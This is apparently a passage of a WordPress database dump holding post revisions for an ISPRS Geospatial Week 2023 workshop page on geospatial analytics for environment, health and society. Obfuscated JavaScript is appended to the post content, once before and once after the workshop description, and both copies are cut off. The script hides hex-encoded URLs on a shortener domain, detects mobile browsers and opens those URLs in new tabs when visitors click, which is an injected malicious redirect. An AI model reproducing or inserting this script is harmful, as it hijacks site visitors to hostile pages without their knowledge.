_0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:45:13','2023-01-14 01:45:13','',3427,'https://gsw2023.com/?p=3546',0,'revision','',0),
(3547,1,'2023-01-14 01:46:57','2023-01-14 01:46:57','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.</p>\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\n<p>&nbsp;</p>\n<p>I.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.</p>\n<p>&nbsp;</p>\n<p>II.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.</p>\n<p>&nbsp;</p>\n<p>III.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</p>\n<p>&nbsp;</p>\n<p>IV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</p>\n<p>&nbsp;</p>\n<p>V.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</p>\n<p>&nbsp;</p>\n<p>VI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\n</ul>\n<p>are the supporting working groups.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 